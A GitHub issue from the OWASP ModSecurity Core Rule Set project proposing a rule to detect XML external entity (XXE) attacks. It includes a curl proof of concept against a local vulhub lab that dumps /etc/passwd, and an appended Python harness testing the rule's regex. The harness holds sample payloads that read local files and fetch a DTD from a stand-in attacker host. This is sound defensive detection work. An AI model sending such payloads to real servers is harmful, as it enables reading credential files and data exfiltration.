SpiderLabs / owasp-modsecurity-crs

OWASP ModSecurity Core Rule Set (CRS) Project (Official Repository)
https://modsecurity.org/crs
Apache License 2.0

XML eXternal Entity #1319

Closed theMiddleBlue closed 5 years ago

theMiddleBlue commented 5 years ago

During the last chat meeting, we talked about creating one or more rules to handle XXE attacks. I'm quite close to a PR; I just want to share some topics with you. I'm trying to cover:

Questions

Before opening a new PR:

Example rule

# Proposed XXE rule (phase 2, request body). Note: in ModSecurity the REQUEST_BODY
# variable is only populated when the URLENCODED request body processor runs; when
# the XML body processor is selected for an application/xml request (as the PoC
# below sends) REQUEST_BODY is empty unless ctl:forceRequestBodyVariable=On was
# set in phase 1, so the target may need to be adjusted for XML-typed requests.
SecRule REQUEST_BODY "@rx <!ENTITY\s+[^\s]+\s+SYSTEM\s+['\"](?i:file|http|https|ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect|zip)://" \
        "id:945020,\
        phase:2,\
        t:none,t:compressWhitespace,\
        log,\
        msg:'XML eXternal Entity: Local or Remote file inclusion',\
        logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
        tag:'application-multi',\
        tag:'platform-multi',\
        tag:'attack-xxe',\
        tag:'OWASP_CRS/WEB_ATTACK/XXE',\
        tag:'WASCTC/WASC-43',\
        tag:'OWASP_TOP_10/A4',\
        tag:'paranoia-level/1',\
        ver:'OWASP_CRS/3.2.0',\
        severity:'CRITICAL',\
        setvar:'tx.msg=%{rule.msg}',\
        setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
        setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XXE-%{MATCHED_VAR_NAME}=%{MATCHED_VAR}'"

PoC

$ git clone https://github.com/vulhub/vulhub.git
$ cd vulhub/php/php_xxe
$ docker-compose up -d

$ # exploit:
$ curl -s -H 'content-type: application/xml' \
   -d @./xxe.xml \
   'http://localhost:8080/simplexml_load_string.php'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
* Connection #0 to host localhost left intact

thanks
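To see what the proposed regex actually covers, here is an added example (my own test harness, not code from the issue or from the CRS project) that runs the rule's pattern, after an approximation of `t:compressWhitespace`, over a handful of constructed XML bodies: a classic `file://` entity, a `php://filter` entity split across tabs and newlines, a parameter entity (`<!ENTITY % dtd SYSTEM ...>`, the form used for blind/out-of-band XXE), a benign `PUBLIC` DOCTYPE and a harmless internal entity. It also includes a widened variant of the regex (my suggestion, not the project's) that admits the `% ` prefix of a parameter entity declaration. The hostname `attacker.example` and the file names in the samples are made up.

```python
import re

# Regex copied verbatim from the proposed rule 945020 in the issue.
SCHEMES = "file|http|https|ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect|zip"
RULE_945020_RX = re.compile(
    r"""<!ENTITY\s+[^\s]+\s+SYSTEM\s+['"](?i:""" + SCHEMES + r""")://"""
)

# Widened variant (hypothetical, my own suggestion): the XML grammar requires
# whitespace on both sides of '%' in a parameter entity declaration
# ('<!ENTITY' S '%' S Name ...), so the original "[^\s]+" for the entity name
# can never cross that gap. Making the "% " prefix optional closes that hole.
WIDENED_RX = re.compile(
    r"""<!ENTITY\s+(?:%\s+)?[^\s]+\s+SYSTEM\s+['"](?i:""" + SCHEMES + r""")://"""
)

# t:compressWhitespace: map 0x20, \f, \t, \n, \r, \v and 0xa0 to a single space
# and collapse runs of them into one space.
_WS = re.compile("[ \f\t\n\r\v\u00a0]+")


def compress_whitespace(body):
    """Approximation of ModSecurity's t:compressWhitespace transformation."""
    return _WS.sub(" ", body)


def rule_matches(rx, body):
    """Apply the rule's transformation chain, then the regex. True on a hit."""
    return rx.search(compress_whitespace(body)) is not None


# Constructed sample request bodies (not from the issue or from vulhub).
SAMPLES = {
    "classic_file": (
        '<?xml version="1.0"?>\n<!DOCTYPE r [\n'
        '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n<r>&xxe;</r>'
    ),
    "php_filter_split_ws": (
        '<!DOCTYPE r [<!ENTITY xxe\tSYSTEM\n'
        '"php://filter/read=convert.base64-encode/resource=index.php">]>'
        '<r>&xxe;</r>'
    ),
    "parameter_entity": (
        '<!DOCTYPE r [\n'
        '  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">\n'
        '  %dtd;\n]>\n<r/>'
    ),
    "benign_public_doctype": (
        '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" '
        '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html/>'
    ),
    "internal_entity": '<!DOCTYPE r [<!ENTITY name "plain text">]><r>&name;</r>',
}


def evaluate(rx=RULE_945020_RX):
    """Return {sample name: bool} for the given regex over all samples."""
    return {name: rule_matches(rx, body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for label, rx in (("rule 945020", RULE_945020_RX), ("widened", WIDENED_RX)):
        print(label)
        for name, hit in evaluate(rx).items():
            print(f"  {'HIT ' if hit else 'miss'}  {name}")
```

Against these samples the rule's regex flags the two inline `SYSTEM` entities and stays quiet on the `PUBLIC` DOCTYPE and the internal entity, but misses the parameter entity declaration entirely; the widened variant catches it without touching the benign cases. Separately, a `data:` URI never contains `://`, so the `data` alternative in the scheme list only fires for PHP's `data://` spelling.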

theMiddleBlue commented 5 years ago

closing this. Please, refer to #1320 (XML attack).